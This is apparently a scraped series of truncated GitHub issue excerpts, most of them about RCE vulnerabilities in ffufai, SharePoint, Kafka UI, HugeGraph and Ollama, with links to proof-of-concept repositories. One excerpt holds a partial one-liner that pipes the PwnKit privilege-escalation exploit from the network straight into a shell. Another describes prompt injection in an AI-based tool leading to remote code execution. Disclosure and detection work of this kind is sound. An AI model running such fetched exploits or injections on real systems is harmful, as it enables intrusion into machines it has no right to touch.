-
Just like what I described in https://github.com/jthack/ffufai/issues/3
we can see both the URL and headers parameters are susceptible to RCE. For instance, a custom header could include any system c…
-
### Template for?
CVE-2024-38094 CVE-2024-38024 CVE-2024-38023
### Details:
PoC
https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC
-
https://github.com/triton-inference-server/dali_backend/ is awesome for reading and preprocessing images
It would be nice to have a more developed builtin solution for decoding audio/videos.
Cur…
-
## Summary
3 new RCEs in Apache Kafka UI
### Basic example
https://github.blog/security/vulnerability-research/3-ways-to-get-remote-code-execution-in-kafka-ui/
### Motivation
RCE is k…
-
Keypoints:
- Redis 4.x / 5.x --> https://github.com/jas502n/Redis-RCE
- [PE] PwnKit --> https://github.com/ly4k/PwnKit
- -` sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/…
-
Hi Team,
I would like to implement a plugin to detect CVE-2024-27348 which is related to Apache HugeGraph.
Details:
https://nvd.nist.gov/vuln/detail/CVE-2024-27348
https://github.com/advisories/…
-
The details have been sent to jc21's email.
-
Was trying to run the script, but unfortunately with no results.
The script returns empty values on all functions being run.
The target website is of version 3.9.7
The code returns this resul…
-
Prompt injection can lead to arbitrary Remote Code Execution (RCE) when user-supplied inputs, such as a URL, are not properly sanitized. In this example (./ffufai.py --max-extensions 5 -u https://he…
-
According to [this research](https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032):
> Ollama’s HTTP server exposes [multiple API endpoints](https://github.com/ollama/ollama/blob/main…